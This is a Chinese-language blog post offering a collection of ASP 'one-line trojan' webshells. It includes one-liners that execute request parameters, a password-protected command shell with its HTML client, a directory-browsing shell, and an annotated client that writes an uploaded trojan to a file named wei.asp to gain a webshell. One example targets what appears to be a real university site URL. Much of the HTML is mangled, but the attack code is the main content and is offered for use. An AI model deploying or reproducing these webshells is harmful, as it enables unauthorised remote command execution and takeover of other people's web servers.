asp一句话html,asp常用的一句话木马大全

【入侵技术】 ASP一句话木马大全

""Then Execute(Request("MH"))%>

""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>

1asp一句话木马

一句话木马 服务器端

带验证:

cmd.asp

if request("authkey")="pic16f873a" then

%>

end if

%>

带验证 客户端

cmd.html

Host:

Cmd :

οnclick="Javascipt:frm.action=document.frm.act.value;

frm.submit();"

type=button value="Send Command">

目录浏览

服务器端

if request("authkey")="pic16f873a" then

szPara = Request.Form("path")

set shell=server.createobject("shell.application")

set dir1=shell.namespace(szPara)

set diritems=dir1.items

for each iii in diritems

response.write iii.path & "[" & iii.size&"]
"

next

end if

%>

客户端

Host:

Path:

type=button value="Send Command">

一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

//"action="后面是需要修改的以asp命名的数据库的提交地址

//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

//这里的value值根据服务端中value而设定

//可以自行修改成相应这里的value值也必须改为p

setlP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "wei.asp"//转向生成的wei.asp和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面

//这段程序的功能:利用插入到数据库文件的这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

添入生成木马的内容/textarea>

//这段标签是你用来添加木马内容用的

程序的主要框架是

//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

//添加木马内容用的

其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~哈哈

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值